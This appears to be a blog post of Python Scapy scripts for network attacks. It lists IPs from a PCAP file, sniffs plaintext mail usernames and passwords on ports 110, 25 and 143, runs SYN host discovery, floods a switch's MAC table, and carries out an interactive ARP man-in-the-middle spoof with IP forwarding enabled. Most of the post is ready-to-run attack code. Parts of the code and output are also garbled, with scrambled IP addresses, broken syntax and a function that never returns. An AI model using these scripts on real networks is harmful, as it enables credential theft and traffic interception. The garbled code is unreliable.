Wechat official account: Operation and maintenance development story, author: Wanger
Get the IP in the PCAP file
from __future__ import print_function
from sys import argv
from scapy.all import rdpcap, IP
def help_text():
print("Usage: python all_devices.py path_to_pcap")
sys.exit()
def extract_host_names(pcap):
machines = []
packets = rdpcap(pcap)
for i in range(len(packets)):
ifpackets[i].haslayer(IP) ! =1:
continue
if packets[i][IP].src not in machines:
machines.append(packets[i][IP].src)
print(len(machines), packets[i][IP].src)
elif packets[i][IP].dst not in machines:
machines.append(packets[i][IP].dst)
print(len(machines), packets[i][IP].dst)
return machines
if __name__ == '__main__':
pcap = argv[1]
if len(argv) < 2:
help_text()
print("\nList of all the hosts in pcap =>", extract_host_names(pcap),end="\n\n")
Copy the code
Example: Enter the pCAP file name to obtain the IP address
[root@VM-8-14-centos ~]# python3 get_pcapip.py 1.pcap
1 10.08.14.
2 117.13638.151.
3 169.254128.18.
4 111.12351.131.
5 140.249214.101.
6 169.254. 04.
7 169.254128.8.
8 20.84. 5671.
9 169.254. 055.
10 107.18928.77.
11 183.6082.98.
12 165.22179.40.
13 113.12810.75.
14 104.248123.197.
List of all the hosts in pcap => ['10.0.8.14'.'117.136.38.151'.'169.254.128.18'.'111.123.51.131'.'140.249.214.101'.'169.254.0.4'.'169.254.128.8'.'20.84.56.71'.'169.254.0.55'.'107.189.28.77'.'183.60.82.98'.'165.22.179.40'.'113.128.10.75'.'104.248.123.197']
Copy the code
Sniff the username and password on mail
from scapy.all import *
def packet_callback(packet) :
if packet[TCP].payload:
mail_packet = str(packet[TCP].payload)
if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
print ("[*] Server: %s" % packet[IP].dst)
print ("[*] %s" % packet[TCP].payload)
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)
Copy the code
Detect live hosts using SYN packets
from __future__ import print_function
from scapy.all import IP, TCP, sr1, sr
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def help_text() :
print("\nUsage:\n python hd_tcp_syn.py network_range\n")
sys.exit()
def host_discovery(network_range) :
ans,unans=sr( IP(dst=network_range)/TCP(dport=80,flags="S"),verbose=0,timeout=1)
ans.summary(lambda(s,r):r.sprintf("\n %IP.src% is alive\n"))
if __name__ == '__main__':
if len(sys.argv) < 2:
help_text()
network_range = sys.argv[1]
host_discovery(network_range)
Copy the code
Switch MAC address table flooding attacks
The principle of MAC flooding on switches has been described in previous articles
from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp
def generate_packets() :
Initialize the packet list
packet_list = []
# Fill the packet_list with 10,000 random Ethernet packets
for i in xrange(1.10000):
packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP())
packet_list.append(packet)
def cam_overflow(packet_list) :
sendp(packet_list, iface='eth0')
if __name__ == '__main__':
packet_list = generate_packets()
cam_overflow(packet_list)
Copy the code
ARP man-in-the-middle spoofing attack
The principle of ARP spoofing has been introduced before
from scapy.all import *
import sys
import os
import time
try:
interface = raw_input("[*] Enter Interface: ")
victimIP = raw_input("[*] Enter Victim IP: ")
gateIP = raw_input("[*] Enter Router IP: ")
except KeyboardInterrupt:
print ("\n[*] User Requested Close")
print ("[*] Exiting...")
sys.exit(1)
print ("\n[*] Enabling IP Forwarding... \n")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
def get_mac(IP) :
conf.verb = 0
ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1)
for snd,rcv in ans:
return rcv.sprintf(r"%Ether.src%")
def reARP() :
print ("\n[*] Restoring Targets...")
victimMAC = get_mac(victimIP)
gateMAC = get_mac(gateIP)
send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7)
send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7)
print ("[*] Shutting Down...")
sys.exit(1)
def trick(gm, vm) :
send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm))
send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm))
def mitm() :
try:
victimMAC = get_mac(victimIP)
except Exception:
print ("[!] Couldn't Find Victim MAC Address")
print ("[!] Exiting...")
sys.exit(1)
try:
gateMAC = get_mac(gateIP)
except Exception:
print ("[!] Couldn't Find Gateway MAC Address")
print ("[!] Exiting...")
sys.exit(1)
print ("[*] Poisoning Targets...")
while 1:
try:
trick(gateMAC, victimMAC)
time.sleep(1.5)
except KeyboardInterrupt:
reARP()
break
if __name__ == '__main__':
mitm()
Copy the code